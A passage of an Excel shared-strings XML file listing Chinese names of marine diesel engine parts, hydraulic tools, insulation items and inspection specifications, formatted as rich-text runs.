        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架外部图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹紧螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中空钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊钩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管夹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管喷嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两半式软管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热轧角钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两半式壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半段壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压分配器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆螺栓拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头螺栓拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承螺栓拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压管组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压上紧工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节液压工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拆卸装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压挠性管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压千斤顶</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横向液压装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀液压管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压千斤顶和泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梅花冲击扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量指示器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃烧室示功阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>‘MAIHAK’</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>感应开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油控制单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器总成（不带螺钉）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器管路</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器试验台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内外链节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刻度板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器芯体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插入椎管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内经千分尺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带罩壳内径千分尺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内置肋板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内壁板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆大端轴瓦的拆卸与检查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查和拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检验记录</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检验范围表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表面检验规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊缝磁粉探伤规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机结构焊后热处理规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热轧钢板超声波探伤规范</t>
    </r>
  </si>
  <si>
    <r>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>级焊根超声波探伤规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊缝超声波探伤规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊缝目视检验说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆火焰淬火说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系泊</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>航海试验说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力测试说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>去应力说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试验规范和说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装顺序指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表盘布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准测试仪表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔热</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝热层</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套绝缘层</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘罩壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路隔热</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘层规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘材料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器转速表隔离模块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两段式绝热材料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔热管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套隔离管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵中间齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油泵中间齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴驱动中间齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间齿轮安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承定位螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器（总成）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器（活塞）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器（垫环）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械式千斤顶</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>段式垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端轴承座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角螺丝刀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位键</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>把手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋钮螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>康士伯控制系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>纵板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标签</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机开关箱标签</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梯子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>薄板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集水板组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集水板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯和电缆槽布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
